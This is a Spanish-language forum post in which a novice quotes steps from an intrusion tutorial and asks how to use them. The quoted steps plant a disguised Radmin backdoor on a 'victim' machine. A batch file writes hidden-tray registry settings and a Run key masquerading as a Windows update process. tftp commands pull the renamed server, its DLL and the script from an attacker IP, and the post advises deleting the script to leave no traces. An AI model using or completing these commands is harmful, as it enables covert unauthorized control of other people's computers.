Después de bastantes años, decidí hacerlo haber que tal ya que soy un completo n00b en esto... así que si pregunto cosas coherentes... LO SIENTO
Y mi duda es la siguiente:
Todo lo que copio a continuación entra dentro del .bat?
6.-Bien ahora vamos a hacer un bat que nos agrege las llaves en el registro y que arranque a radmin con el inicio del sistema.
codigo:
Citar
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d "b7060000"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d "3Ab503515d51eb10c3f98c7ab7bc5993"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d "01000000"
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuauclt /t REG_SZ /d "C:\windows\system32\wuaudt.exe"
solo sustituyan los valores por los suyos.
7.-Subir archivos via tftp
una ves que tengamos una shell remota de la victima vamos a subirle a radmin, para eso siguiendo el ejemplo que estoy poniendo seria:
Citar
tftp -i xxx.xxx.xxx.xxx get wuaudt.exe C:\windows\system32\wuaudt.exe
este es el radmin ya debidamente camuflageado
Citar
tftp -i xxx.xxx.xxx.xxx get AdmDll.dll C:\windows\system32\AdmDll.dll
la dll del radmin, no le cambien el nombre
Citar
tftp -i xxx.xxx.xxx.xxx get 1025.bat C:\windows\system32\1025.bat
este es el bat que se encarga de agregar los valores en el registro, pueden agregarle un del al final del bat para no dejar rastros (ejem: del 1025.bat)
Por otro lado, cuando pone tftp -i xxx.xxx.xxx.xxx que se supone que debo poner en dichas xxx? Ojalá pudieran ayudarme después de tantos años... muchisimas gracias de antemano!!
Autor
En línea
